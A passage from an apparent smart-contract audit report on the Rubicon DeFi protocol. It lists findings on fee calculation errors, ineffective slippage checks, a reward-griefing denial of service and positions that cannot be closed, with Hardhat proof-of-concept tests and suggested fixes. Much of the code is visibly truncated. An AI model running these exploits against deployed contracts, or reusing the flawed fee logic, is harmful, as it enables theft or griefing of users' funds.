        // testStableCoin is asset token when calling Position.buyAllAmountWithLeverage function
        const ownerTestStableCoinBefore = await testStableCoin.balanceOf(owner.address);

        // owner calls Position.buyAllAmountWithLeverage function
        await Position.connect(owner).buyAllAmountWithLeverage(

        // owner sends 25000000000000000000 quote tokens
        const ownerTestCoinBalanceAfter = await testCoin.balanceOf(owner.address);

        // owner receives 5624437 asset tokens
        const ownerTestStableCoinAfter = await testStableCoin.balanceOf(owner.address);

Second, please update the Position._marketBuy function, as follows, to divide by 100_000 for the POC purpose.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        /** @audit divide by 100_000 for POC purpose */
        // uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(100_000);
        /** */

        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);


Third, please add the following changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000 test in the Long positions describe block in test\hardhat-tests\leverage-wrapper.ts. This test will pass to show the number of asset tokens received by the user who calls the Position.buyAllAmountWithLeverage function when the Position._marketBuy function calculates _fee through dividing by 100_000. This test also demonstrates that the user should receive more asset tokens when the Position._marketBuy function calculates _fee through dividing by 100_000 than when the Position._marketBuy function calculates _fee through dividing by 10000.

      it.only("changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000", async function () {
        const { owner, testCoin, testStableCoin, Position} =
          await loadFixture(deployPoolsUtilityFixture);

        // testCoin is quote token when calling Position.buyAllAmountWithLeverage function
        const ownerTestCoinBalanceBefore = await testCoin.balanceOf(owner.address);

        // testStableCoin is asset token when calling Position.buyAllAmountWithLeverage function
        const ownerTestStableCoinBefore = await testStableCoin.balanceOf(owner.address);

        // owner calls Position.buyAllAmountWithLeverage function
        await Position.connect(owner).buyAllAmountWithLeverage(

        // owner still sends 25000000000000000000 quote tokens
        const ownerTestCoinBalanceAfter = await testCoin.balanceOf(owner.address);

        // yet, owner receives 5624943 asset tokens
        const ownerTestStableCoinAfter = await testStableCoin.balanceOf(owner.address);

        // owner receives more asset tokens in this situation than when Position._marketBuy function calculates _fee through dividing by 10000

Tools Used


The Position._marketBuy and Position._marketSell functions can be updated to divide by 100_000, instead of 10000, when calculating _fee.

bghughes (Rubicon) confirmed via duplicate issue #1025

HickupHH3 (judge) decreased severity to Medium

[M-14] Incorrect calculations can occur when calling Position._marketBuy and Position._marketSell functions that do not include maker fee in _fee

Submitted by rbserver, also found by adriro, zhuXKET, immeas, bin2chen, cccz, rvierdiiev, said, anodaram, T1MOH, RaymondFam, MalfurionWhitehat, ladboy233 and J4de.

When the following Position._marketBuy and Position._marketSell functions calculate _fee, the maker fee is not included.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);
        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);


    function _marketSell(
        address _asset,
        address _quote,
        uint256 _minFill
    ) internal {
        uint256 _feeBPS = rubiconMarket.getFeeBPS();
        uint256 _fee = _minFill.mul(_feeBPS).div(10000);
        uint256 _payAmount = rubiconMarket.getPayAmount(
        uint256 _assetBalance = IERC20(_asset).balanceOf(address(this));

        /// @dev recalculate fee in _asset form
        _fee = _payAmount.mul(_feeBPS).div(10000);

        if (_assetBalance < _payAmount) {



When the Position._marketBuy and Position._marketSell functions eventually call the following function, the maker fee can be considered and paid when makerFee() > 0 is true.

    function buy(
        uint256 id,
        uint256 quantity
    ) public virtual can_buy(id) synchronized returns (bool) {
        OfferInfo memory _offer = offers[id];
        uint256 spend = mul(quantity, _offer.buy_amt) / _offer.pay_amt;

        require(uint128(spend) == spend, "spend is not an int");
        require(uint128(quantity) == quantity, "quantity is not an int");

        ///@dev For backwards semantic compatibility.
        if (
            quantity == 0 ||
            spend == 0 ||
            quantity > _offer.pay_amt ||
            spend > _offer.buy_amt
        ) {
            return false;

        offers[id].pay_amt = sub(_offer.pay_amt, quantity);
        offers[id].buy_amt = sub(_offer.buy_amt, spend);

        /// @dev Fee logic added on taker trades
        uint256 fee = mul(spend, feeBPS) / 100_000;
            _offer.buy_gem.transferFrom(msg.sender, feeTo, fee),
            "Insufficient funds to cover fee"

        // taker pay maker 0_0
        if (makerFee() > 0) {
            uint256 mFee = mul(spend, makerFee()) / 100_000;

            /// @dev Handle the v1 -> v2 migration case where if owner == address(0) we transfer this fee to _offer.recipient
            if (_offer.owner == address(0) && getRecipient(id) != address(0)) {
                    "Insufficient funds to cover fee"
            } else {
                    _offer.buy_gem.transferFrom(msg.sender, _offer.owner, mFee),
                    "Insufficient funds to cover fee"


Since the Position._marketBuy and Position._marketSell functions do not consider the maker fee but the function does, _fee calculated by the Position._marketBuy and Position._marketSell functions and the fees, including the maker fee, that are paid by the user when calling the function are different. As a result, calling the Position contract’s functions that eventually call the Position._marketBuy or Position._marketSell function can cause incorrect calculations and user funds to be lost. For instance, when calling the Position.buyAllAmountWithLeverage function, the user should receive less asset tokens when the Position._marketBuy function includes the maker fee in _fee than when the Position._marketBuy function does not include the maker fee in _fee. Since the Position._marketBuy function currently does not include the maker fee in _fee, the user receives more asset tokens than she or he is entitled to, and other users’ asset tokens in the protocol are lost.

Proof of Concept

First, please update the Position._marketBuy function as follows to divide by 100_000 for the POC purpose. This is for fixing the bug mentioned in the report titled “Calling Position._marketBuy and Position._marketSell functions that calculate _fee by dividing by 10000 can cause incorrect calculations”.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        /** @audit divide by 100_000 for POC purpose */
        // uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(100_000);
        /** */

        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);


Second, please add the following changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000 but does not consider maker fee test in the Long positions describe block in test\hardhat-tests\leverage-wrapper.ts. This test will pass to show the number of asset tokens received by the user who calls the Position.buyAllAmountWithLeverage function when the Position._marketBuy function does not include the maker fee in _fee.

      it.only("changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000 but does not consider maker fee", async function () {
        const { owner, testCoin, testStableCoin, Position, rubiconMarket} =
          await loadFixture(deployPoolsUtilityFixture);

        // testCoin is quote token when calling Position.buyAllAmountWithLeverage function
        const ownerTestCoinBalanceBefore = await testCoin.balanceOf(owner.address);

        // testStableCoin is asset token when calling Position.buyAllAmountWithLeverage function
        const ownerTestStableCoinBefore = await testStableCoin.balanceOf(owner.address);

        // there is a maker fee
        const fee = 50;
        await rubiconMarket.setMakerFee(fee);

        // owner calls Position.buyAllAmountWithLeverage function
        await Position.connect(owner).buyAllAmountWithLeverage(

        // owner sends 25000000000000000000 quote tokens
        const ownerTestCoinBalanceAfter = await testCoin.balanceOf(owner.address);

        // owner receives 5624942 asset tokens
        const ownerTestStableCoinAfter = await testStableCoin.balanceOf(owner.address);

Third, please update the Position._marketBuy function again as follows to include the maker fee in _fee for the POC purpose.

    function _marketBuy(
        address _asset,
        address _quote,
        uint256 _maxFill
    ) internal {
        /** @audit divide by 100_000 for POC purpose */
        // uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(10000);
        uint256 _fee = _maxFill.mul(rubiconMarket.getFeeBPS()).div(100_000);
        /** */

        /** @audit consider maker fee for POC purpose */
        if (rubiconMarket.makerFee() > 0) {
            _fee += mul(_maxFill, rubiconMarket.makerFee()) / 100_000;
        /** */

        uint256 _buyAmount = rubiconMarket.getBuyAmount(
        IERC20(_quote).approve(address(rubiconMarket), _maxFill);


Fourth, please add the following changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000 and also considers maker fee test in the Long positions describe block in test\hardhat-tests\leverage-wrapper.ts. This test will pass to show the number of asset tokens received by the user who calls the Position.buyAllAmountWithLeverage function when the Position._marketBuy function includes the maker fee in _fee. This test also demonstrates that the user should receive less asset tokens when the Position._marketBuy function includes the maker fee in _fee than when the Position._marketBuy function does not include the maker fee in _fee.

      it.only("changes of quote and asset tokens when Position._marketBuy function calculates _fee through dividing by 100_000 and also considers maker fee", async function () {
        const { owner, testCoin, testStableCoin, Position, rubiconMarket} =
          await loadFixture(deployPoolsUtilityFixture);

        // testCoin is quote token when calling Position.buyAllAmountWithLeverage function
        const ownerTestCoinBalanceBefore = await testCoin.balanceOf(owner.address);

        // testStableCoin is asset token when calling Position.buyAllAmountWithLeverage function
        const ownerTestStableCoinBefore = await testStableCoin.balanceOf(owner.address);

        // there is a maker fee
        const fee = 50;
        await rubiconMarket.setMakerFee(fee);

        // owner calls Position.buyAllAmountWithLeverage function
        await Position.connect(owner).buyAllAmountWithLeverage(

        // owner still sends 25000000000000000000 quote tokens
        const ownerTestCoinBalanceAfter = await testCoin.balanceOf(owner.address);

        // yet, owner receives 5622129 asset tokens
        const ownerTestStableCoinAfter = await testStableCoin.balanceOf(owner.address);

        // owner receives less asset tokens in this situation than when Position._marketBuy function does not consider maker fee

Tools Used


The Position._marketBuy and Position._marketSell functions can be updated to include the maker fee in _fee when rubiconMarket.makerFee() > 0 is true.

HickupHH3 (judge) decreased severity to Medium and commented:

As mentioned in #282, issues with the market’s implementation make it difficult for me to claim that _marketBuy() and _marketSell() shouldn’t be accounting for fees at all.

Thus, I am separating this issue from #282 and #1312

[M-15] Calling Position._marketSell function compares fill_amt that includes fee to min_fill_amount that does not include fee

Submitted by rbserver, also found by volodya.

Calling the following Position._marketSell function calls rubiconMarket.sellAllAmount(ERC20(_asset), _payAmount, ERC20(_quote), _minFill), where _minFill does not include _fee.

    function _marketSell(
        address _asset,
        address _quote,
        uint256 _minFill
    ) internal {
        uint256 _feeBPS = rubiconMarket.getFeeBPS();
        uint256 _fee = _minFill.mul(_feeBPS).div(10000);
        uint256 _payAmount = rubiconMarket.getPayAmount(
        uint256 _assetBalance = IERC20(_asset).balanceOf(address(this));

        /// @dev recalculate fee in _asset form
        _fee = _payAmount.mul(_feeBPS).div(10000);

        if (_assetBalance < _payAmount) {



Calling the following RubiconMarket.sellAllAmount function then executes require(fill_amt >= min_fill_amount, "min_fill_amount isn't filled"). In contrast to min_fill_amount, which is the Position._marketSell function’s _minFill that does not include _fee, fill_amt used in this require statement includes the fee. This means that fill_amt is very likely to be bigger than min_fill_amount, which makes this require statement and the corresponding slippage control not effective. In fact, as shown by the POC below, the fill_amt with the fee deducted that is set by calling calcAmountAfterFee(fill_amt) can equal min_fill_amount, which also proves that the fill_amt, which includes the fee, would be larger than min_fill_amount that does not include fee, and improperly comparing these two in the require statement would only result in an ineffective slippage control.

    function sellAllAmount(
        ERC20 pay_gem,
        uint256 pay_amt,
        ERC20 buy_gem,
        uint256 min_fill_amount
    ) external returns (uint256 fill_amt) {

        uint256 offerId;
        while (pay_amt > 0) {
            //while there is amount to sell
            offerId = getBestOffer(buy_gem, pay_gem); //Get the best offer for the token pair
            require(offerId != 0, "0 offerId"); //Fails if there are not more offers

            // There is a chance that pay_amt is smaller than 1 wei of the other token
            if (
                mul(pay_amt, 1 ether) <
                wdiv(offers[offerId].buy_amt, offers[offerId].pay_amt)
            ) {
                break; //We consider that all amount is sold
            if (pay_amt >= offers[offerId].buy_amt) {
                //If amount to sell is higher or equal than current offer amount to buy
                fill_amt = add(fill_amt, offers[offerId].pay_amt); //Add amount bought to acumulator
                pay_amt = sub(pay_amt, offers[offerId].buy_amt); //Decrease amount to sell
                take(bytes32(offerId), uint128(offers[offerId].pay_amt)); //We take the whole offer
            } else {
                // if lower
                uint256 baux = rmul(
                    mul(pay_amt, 10 ** 9),
                    rdiv(offers[offerId].pay_amt, offers[offerId].buy_amt)
                ) / 10 ** 9;
                fill_amt = add(fill_amt, baux); //Add amount bought to acumulator
                take(bytes32(offerId), uint128(baux)); //We take the portion of the offer that we need
                pay_amt = 0; //All amount is sold
        require(fill_amt >= min_fill_amount, "min_fill_amount isn't filled");
        fill_amt = calcAmountAfterFee(fill_amt);

Proof of Concept

First, please update the Position._marketSell function as follows to divide by 100_000 for the POC purpose. This is for fixing the bug mentioned in the report titled “Calling Position._marketBuy and Position._marketSell functions that calculate _fee by dividing by 10000 can cause incorrect calculations”.

    function _marketSell(
        address _asset,
        address _quote,
        uint256 _minFill
    ) internal {
        uint256 _feeBPS = rubiconMarket.getFeeBPS();

        /** @audit divide by 100_000 for POC purpose */
        // uint256 _fee = _minFill.mul(_feeBPS).div(10000);
        uint256 _fee = _minFill.mul(_feeBPS).div(100_000);
        /** */

        uint256 _payAmount = rubiconMarket.getPayAmount(
        uint256 _assetBalance = IERC20(_asset).balanceOf(address(this));

        /** @audit divide by 100_000 for POC purpose */
        /// @dev recalculate fee in _asset form
        // _fee = _payAmount.mul(_feeBPS).div(10000);
        _fee = _payAmount.mul(_feeBPS).div(100_000);
        /** */

        if (_assetBalance < _payAmount) {



Second, please update the RubiconMarket.sellAllAmount function as follows to log min_fill_amount, the fill_amt that includes fee, and the fill_amt with the fee deducted for the POC purpose.

    function sellAllAmount(
        ERC20 pay_gem,
        uint256 pay_amt,
        ERC20 buy_gem,
        uint256 min_fill_amount
    ) external returns (uint256 fill_amt) {

        uint256 offerId;
        while (pay_amt > 0) {
            //while there is amount to sell
            offerId = getBestOffer(buy_gem, pay_gem); //Get the best offer for the token pair
            require(offerId != 0, "0 offerId"); //Fails if there are not more offers

            // There is a chance that pay_amt is smaller than 1 wei of the other token
            if (
                mul(pay_amt, 1 ether) <
                wdiv(offers[offerId].buy_amt, offers[offerId].pay_amt)
            ) {
                break; //We consider that all amount is sold
            if (pay_amt >= offers[offerId].buy_amt) {
                //If amount to sell is higher or equal than current offer amount to buy
                fill_amt = add(fill_amt, offers[offerId].pay_amt); //Add amount bought to acumulator
                pay_amt = sub(pay_amt, offers[offerId].buy_amt); //Decrease amount to sell
                take(bytes32(offerId), uint128(offers[offerId].pay_amt)); //We take the whole offer
            } else {
                // if lower
                uint256 baux = rmul(
                    mul(pay_amt, 10 ** 9),
                    rdiv(offers[offerId].pay_amt, offers[offerId].buy_amt)
                ) / 10 ** 9;
                fill_amt = add(fill_amt, baux); //Add amount bought to acumulator
                take(bytes32(offerId), uint128(baux)); //We take the portion of the offer that we need
                pay_amt = 0; //All amount is sold

        /** @audit console.log min_fill_amount for POC purpose */
        /** */

        /** @audit console.log fill_amt for POC purpose */
        console.log("fill_amt that includes fee:");

        console.log("Is the fill_amt, which includes fee, bigger than min_fill_amount that does not include fee?");
        console.log(fill_amt > min_fill_amount);
        /** */

        require(fill_amt >= min_fill_amount, "min_fill_amount isn't filled");
        fill_amt = calcAmountAfterFee(fill_amt);

        /** @audit console.log fill_amt with fee deducted for POC purpose */
        console.log("fill_amt with fee deducted:");

        console.log("Does the fill_amt with fee deducted equal min_fill_amount that does not include fee?");
        console.log(fill_amt == min_fill_amount);
        /** */

Third, please add the following Calling Position._marketSell function compares fill_amt that includes fee to min_fill_amount that does not include fee test in the Long positions describe block in test\hardhat-tests\leverage-wrapper.ts. This test will pass to print the logs below for demonstrating the described scenario:

      it.only("Calling Position._marketSell function compares fill_amt that includes fee to min_fill_amount that does not include fee", async function () {
        const { owner, testCoin, testStableCoin, Position, rubiconMarket } =
          await loadFixture(deployPoolsUtilityFixture);

        await Position.connect(owner).buyAllAmountWithLeverage(

        await rubiconMarket.functions["offer(uint256,address,uint256,address)"](
          parseUnits("1300", 6),
          { from: owner.address }

        // Call Position.closePosition function, which further calls Position._marketSell function.
        // console.logs in RubiconMarket.sellAllAmount function show that
        //   the fill_amt, which includes fee, is bigger than min_fill_amount that does not include fee and
        //   the fill_amt with fee deducted equals min_fill_amount input that does not include fee.
        await Position.connect(owner).closePosition(1);

fill_amt that includes fee:

Is the fill_amt, which includes fee, bigger than min_fill_amount that does not include fee?

fill_amt with fee deducted:

Does the fill_amt with fee deducted equal min_fill_amount that does not include fee?

Tools Used


The Position._marketSell function can be updated to call rubiconMarket.sellAllAmount(ERC20(_asset), _payAmount, ERC20(_quote), _minFill.add(_fee)) instead of rubiconMarket.sellAllAmount(ERC20(_asset), _payAmount, ERC20(_quote), _minFill).

HickupHH3 (judge) commented:

It’s unclear to me whether min_fill_amt should be inclusive or exclusive of fees because the sellAllAmount() function itself is buggy with regards to fee accounting: the fill_amt fails to account for fees because the offer isn’t entirely filled because of fee inclusivity, so it’s an inflated value.

The fee is also charged on the pay_amt, not sure if incrementing it in the min_fill_amt entirely mitigates the issue.

[M-16] BathBuddy rewards DoS

Submitted by Tricko.

As described in the docs, Rubicon protocol allows users to act as as liquidity providers (LPs), by providing funds and receiving bathToken in return, which can be used to obtain rewards through BathBuddy contract. But BathBuddy internal logic allows any user to DoS reward distribution to smalls LPs by constantly calling getReward at small intervals. This is specially effective against small LPs. This finding should be classified as having medium severity, even though no funds are at risk, the attacker can affect the protocol’s functionality for an indefinite period of time.

Proof of Concept

BathBuddy’s user rewards are calculated as shown below:

function earned(
        address account,
        address token
    ) public view override returns (uint256) {
        require(friendshipStarted, "I have not started a bathToken friendship");

            IERC20(myBathTokenBuddy) // Care with this?

Where rewardPerToken values are updated by calling the rewardPerToken function:

function rewardPerToken(address token) public view returns (uint256) {
        require(friendshipStarted, "I have not started a bathToken friendship");

        if (IERC20(myBathTokenBuddy).totalSupply() == 0) {
            return rewardsPerTokensStored[token];

As we can see in the code snippet above, if the interval between calls to rewardPerToken are small, the resulting rewardsPerToken updates will also be small. Therefore, there is the possibility of the user earned values rounding down to zero, especially if the user’s bathToken balance are small compared to bathToken totalSupply().

This enables a malicious actor to block reward distribution to smalls LPs by constantly calling getReward, to keep refreshing the global lastUpdateTime; for example, at every new block (2s on Optimism). As gas fees are low in L2 networks, the malicious actor can DoS at little cost, while affecting many small LPs .

The following test reproduces the above scenario, demonstrating that reward distribution to users with small bathToken balances can be completely and indefinitely blocked by repeatedly calling getReward:

import { time, loadFixture } from "@nomicfoundation/hardhat-network-helpers";
import { anyValue } from "@nomicfoundation/hardhat-chai-matchers/withArgs";
import { expect } from "chai";
import { ethers, network } from "hardhat";
import { formatUnits, parseUnits } from "ethers/lib/utils";

// TODO: Implement Proxy-wrapping helper functions and proxy-wrapped contracts generally
describe("RubiconV2 rewards system", function () {
  const CERC20_ABI = [
    "function name() external view returns(string memory)",
    "function symbol() external view returns(string memory)",
    "function decimals() external view returns(uint8)",
    "function balanceOf(address) external view returns(uint256)",
    "function admin() external view returns(address)",
    "function mint(uint256) external returns(uint256)",
  const BUDDY_ABI = [
    "function setRewardsDuration(uint256,address) external",
    "function notifyRewardAmount(uint256,address) external",
    "function earned(address,address) external view returns(uint256)",

  async function buddySetupFixture() {
    // Contracts are deployed using the first signer/account by default
    const [owner, alice, eve] = await ethers.getSigners();

    // Use Compound Fork to spawn some cTokens...
    // Note: In prod COMP uses Unitroller for Comptroller storage and upgradeability*
    const ComptrollerFactory = await ethers.getContractFactory("Comptroller");
    const comptroller = await ComptrollerFactory.deploy(); // TODO: Rename to bath house?

    const BathHouse = await ethers.getContractFactory("BathHouseV2");
    const bathHouse = await BathHouse.deploy();

    await bathHouse.initialize(comptroller.address, owner.address);

    // Deploy Test ERC20 to use throughout testing
    const testCoinFactory = await ethers.getContractFactory("TokenWithFaucet");
    const testCoin = await testCoinFactory.deploy(
    const testStableCoin = await testCoinFactory.deploy(
      "Test Stablecoin",

    const testRewardCoin = await testCoinFactory

    const interestRateModelFactory = await ethers.getContractFactory(

    // Inputs
    const baseRatePerYear = parseUnits("0.3"); //  TODO: WHAT SHOULD THIS BE?
    const multiplierPerYear = parseUnits("0.02"); //  TODO: WHAT SHOULD THIS BE?
    const irModel = await interestRateModelFactory.deploy(

    const cTokenFactory = await ethers.getContractFactory("CErc20Delegate");
    const cTokenImplementation = await cTokenFactory.deploy();

    // Initialize the market
    const underlying = testCoin.address;
    const interestRateModel = irModel.address;
    const initialExchangeRateMantissa = "200000000000000000000000000"; // TODO: What should this be?

    const becomeImplementationData = "0x"; //TODO: What should this be?

    await bathHouse.createBathToken(
    const bathTokenAddress = await bathHouse.getBathTokenFromAsset(underlying);
    const bathTEST = new ethers.Contract(bathTokenAddress, CERC20_ABI, owner);

    const buddyAddress = await bathHouse.whoIsBuddy(bathTokenAddress);
    const buddy = new ethers.Contract(buddyAddress, BUDDY_ABI, owner);

    // Setup cToken in System correctly:
    await comptroller._supportMarket(bathTEST!.address).catch((e: any) => {
      console.log("\nError supporting new cToken market!", e.reason, "\n");

    await testCoin.connect(alice).faucet();
    await testStableCoin.connect(alice).faucet();
    await testCoin.connect(eve).faucet();
    await testStableCoin.connect(eve).faucet();

    await buddy.setRewardsDuration(
      365 * 24 * 60 * 60,
    await testStableCoin.transfer(buddy.address, parseUnits("10000", 6));
    await buddy.notifyRewardAmount(
      parseUnits("10000", 6),

    await comptroller.setCompAddress(testRewardCoin.address);
    await comptroller._setCompSpeeds(

    const PriceOracleFactory = await ethers.getContractFactory(
    const priceOracle = await PriceOracleFactory.deploy();

    // price of TEST = $0.9
    await priceOracle.addCtoken(bathTEST.address, parseUnits("0.9", 18));

    await comptroller._setPriceOracle(priceOracle.address);

    await comptroller._setCollateralFactor(bathTEST.address, parseUnits("0.7"));

    const rewardBalance = await testRewardCoin.balanceOf(owner.address);
    await testRewardCoin.transfer(comptroller.address, rewardBalance);

    await testCoin.connect(alice).approve(bathTEST.address, parseUnits("10"));
    await bathTEST.connect(alice).mint(parseUnits("10"));
    await testCoin.connect(eve).approve(bathTEST.address, parseUnits("10000"));
    await bathTEST.connect(eve).mint(parseUnits("10000"));

    return {

  describe("Testing the rewards", async function () {
    it("POC1", async function () {
      const {
      } = await loadFixture(buddySetupFixture);

      // Eve calls claimRewards to reset lastUpdateTime (claimRewards internaly calls BathBuddy's getReward)
      await bathHouse.connect(eve).claimRewards([buddy.address], [testStableCoin.address])
      // Alice tries to claim her rewards
      await bathHouse.connect(alice).claimRewards([buddy.address], [testStableCoin.address])
      const earned1 = await testStableCoin.balanceOf(alice.address);

      // Eve calls claimRewards to reset lastUpdateTime
      await bathHouse.connect(eve).claimRewards([buddy.address], [testStableCoin.address])
      // Alice tries to claim her rewards
      await bathHouse.connect(alice).claimRewards([buddy.address], [testStableCoin.address])
      const earned2 = await testStableCoin.balanceOf(alice.address);
      // Check that Alice didn't get any rewards
      expect(earned2.toBigInt() - earned1.toBigInt());

      // Eve calls claimRewards to reset lastUpdateTime
      await bathHouse.connect(eve).claimRewards([buddy.address], [testStableCoin.address])
      // Alice tries to claim her rewards
      await bathHouse.connect(alice).claimRewards([buddy.address], [testStableCoin.address])
      const earned3 = await testStableCoin.balanceOf(alice.address);
      // Check that Alice didn't get any rewards
      expect(earned3.toBigInt() - earned2.toBigInt());

      // Eve calls claimRewards to reset lastUpdateTime
      await bathHouse.connect(eve).claimRewards([buddy.address], [testStableCoin.address])
      await bathHouse.connect(alice).claimRewards([buddy.address], [testStableCoin.address])
      const earned4 = await testStableCoin.balanceOf(alice.address);
      // Check that Alice didn't get any rewards
      expect(earned4.toBigInt() - earned4.toBigInt());

daoio (Rubicon) acknowledged

HickupHH3 (judge) commented:

Griefing through loss of yield for small LPs.

[M-17] The return value of buyAllAmount is incorrect

Submitted by cccz, also found by cducrest, ElKu and bytes032.

buyAllAmount will return the amount of tokens spent on the exchange, but the actual return value is less than the actual amount of tokens spent.

Consider WBTC price is 10000 USDC and the total fee is 10%. The user calls buyAllAmount to buy 1 WBTC, and the calculated fill_amt is 10,000 USDC.

    function buyAllAmount(
        ERC20 buy_gem,
        uint256 buy_amt,
        ERC20 pay_gem,
        uint256 max_fill_amount
    ) external returns (uint256 fill_amt) {
        uint256 offerId;
        while (buy_amt > 0) {
            //Meanwhile there is amount to buy
            offerId = getBestOffer(buy_gem, pay_gem); //Get the best offer for the token pair
            require(offerId != 0, "offerId == 0");

            // There is a chance that buy_amt is smaller than 1 wei of the other token
            if (
                mul(buy_amt, 1 ether) <
                wdiv(offers[offerId].pay_amt, offers[offerId].buy_amt)
            ) {
                break; //We consider that all amount is sold
            if (buy_amt >= offers[offerId].pay_amt) {
                //If amount to buy is higher or equal than current offer amount to sell
                fill_amt = add(fill_amt, offers[offerId].buy_amt); //Add amount sold to acumulator
                buy_amt = sub(buy_amt, offers[offerId].pay_amt); //Decrease amount to buy
                take(bytes32(offerId), uint128(offers[offerId].pay_amt)); //We take the whole offer
            } else {
                //if lower
                fill_amt = add(
                        mul(buy_amt, 10 ** 9),
                        rdiv(offers[offerId].buy_amt, offers[offerId].pay_amt)
                    ) / 10 ** 9
                ); //Add amount sold to acumulator
                take(bytes32(offerId), uint128(buy_amt)); //We take the portion of the offer that we need
                buy_amt = 0; //All amount is bought

In the buy function, the 1 WBTC to be purchased minus the fee is 0.9 WBTC. That is, the user actually spends 10,000 USDC to buy 0.9 WBTC, and the fill_amt finally returned is 10000 USDC minus the fee is 9000 USDC, but the user actually spends 10000 USDC, which causes the return value of buyAllAmount to be incorrect.

            fill_amt <= max_fill_amount,
            "fill_amt exceeds max_fill_amount"
        fill_amt = calcAmountAfterFee(fill_amt);

Proof of Concept

Change to:

            fill_amt <= max_fill_amount,
            "fill_amt exceeds max_fill_amount"
-       fill_amt = calcAmountAfterFee(fill_amt);

HickupHH3 (judge) commented:

It’s not a duplicate, as it’s not about incorrect calculation. It’s about the return amount being exclusive of fees when it should.

[M-18] Cannot close leveraged positions

Submitted by sinarette, also found by adriro and Jigsaw.

Opening a leveraged position goes through some cycles of supplying collateral and borrowing. Since the leverage is larger than 1, the borrowed amount is usually larger than the liquid asset. So in most cases, you would need to repeat the loop backwards (repay, redeem, swap…). However, closePosition tries to repay the whole borrowed amount at once, which would revert. As a result, the user would fail to close a position if he has no extra liquid assets.

Proof of Concept

closePosition first repays the borrowed asset, then redeems the collateral and closes the position:

/* Position.sol # closePosition */
  _repay(asset, quote, posId);
  _redeem(asset, bathTokenAmount);


_repay would always try to repay the whole borrowed quote tokens, so first it would sell the asset tokens for quote tokens. However, since this is a leveraged position, there won’t be enough asset tokens to sell here:

/* Position.sol # _repay */
  address _bathTokenQuote = bathHouseV2.getBathTokenFromAsset(_quote);
  uint256 _amountToRepay = borrowBalanceOfPos(_posId); // total borrowed quote tokens

  // sell asset for quote
  _rubiconSwap(_asset, _quote, _amountToRepay, false);
  uint256 _quoteBalance = IERC20(_quote).balanceOf(address(this));

It would try to replenish the asset tokens from the owner, which would fail if there’s not enough balance:

/* Position.sol # _marketSell */
  if (_assetBalance < _payAmount) {

The below test shows that the position closing would revert if there’s not enough assets:

  it.only("Cannot close position", async function () {
    const { owner, testCoin, testStableCoin, Position, rubiconMarket } =
      await loadFixture(deployPoolsUtilityFixture);

    await Position.connect(owner).buyAllAmountWithLeverage(

    /* Revoke: as if there were no assets */
    await testCoin.connect(owner).approve(Position.address, parseUnits("0"));
    /* Cannot close position without enough assets */
    await expect(Position.connect(owner).closePosition(1));

Tools Used


Add a repay loop (repay - redeem - swap…), or enable partially closing positions.

daoio (Rubicon) disagreed with severity, disputed and commented:

It’s mainly intended behavior and user needs to firstly repay the debt before redemption of his tokens; though, I like the idea of partially closing position.

HickupHH3 (judge) decreased severity to Medium and commented:

If I open a position, I should be able to close it in the same block without requiring further capital from my end because it should unwind correctly.

Considering this Medium severity because the debt can be repaid and have the position closed, so there isn’t exactly a loss of funds, but it’s bad UX arising from unsatisfactory unwinding behaviour.

[M-19] A liquidated position possibly cannot be closed

Submitted by thekmj, also found by immeas, bin2chen and ast3ros.

The Compound V2 protocol is a lending protocol that allows users to supply collaterals in order to borrow other assets (possibly the collateral itself). If a user’s position gets undercollateralized, the user will get liquidated (i.e. a liquidator can seize some of their collateral, while repaying also part of their debt.)

The problem is that, if a user’s created margin position gets liquidated, it is not possible to close said position, at least not without disrupting other positions alongside that.

This is because the function closePosition() will attempt to close the position using the full amount it has been provided when opening. In other words, the contract never got the info that any liquidations happened, and will attempt to explicitly undo the position in addition to closing it.

Proof of concept

We will use test/hardhat-tests/leverage-wrapper.ts for the POC.

  • Firstly, we want more data returned from the fixture. Modify the following lines from the fixture as follows:

return {
  priceOracle, // add this
  comptroller, // add this
  • Then, paste the following test:
describe("Liquidated position bug", function () {
  it("POC", async function () {
    const { owner, testCoin, testStableCoin, cToken, cTokenStable, Position, otherAccount, priceOracle, comptroller } = await loadFixture(
    ); // I really went all out on this didn't I?

    // assert that, initially, the Position contract holds no cTokens
    expect(await cToken.balanceOf(Position.address));

    // let's first open a long position with 2x margin
    await Position.connect(owner).buyAllAmountWithLeverage(

    // now drop the price to half
    await priceOracle.addCtoken(cToken.address, parseUnits("0.5", 18));

    // caveat: gotta set the close factor and liq incentive first
    await comptroller.connect(owner)._setCloseFactor(parseUnits("0.5"));
    await comptroller.connect(owner)._setLiquidationIncentive(parseUnits("0.1"));

    // now fund otherAccount with some testStableCoin, and liquidate
    await testStableCoin.connect(otherAccount).faucet();
    await testStableCoin.connect(otherAccount).approve(cTokenStable.address, parseUnits("100000")); // excess approval is fine
    await cTokenStable.connect(otherAccount).liquidateBorrow(Position.address, parseUnits("12", 6), cToken.address); // liquidated!

    // now attempt to close the position, but fail
    await expect(Position.connect(owner).closePosition(1));

    // however, the position contract still have cToken, but also positive debt
    expect(await cToken.balanceOf(Position.address));
    expect(await cTokenStable.borrowBalanceStored(Position.address));

It is worth noting that the funds can still be recovered. This is because Compound exposes a function, repayBehalf, allowing the user to repay on behalf of Position, and Position itself exposes a function, withdraw, allowing users to withdraw their CTokens directly and redeem.

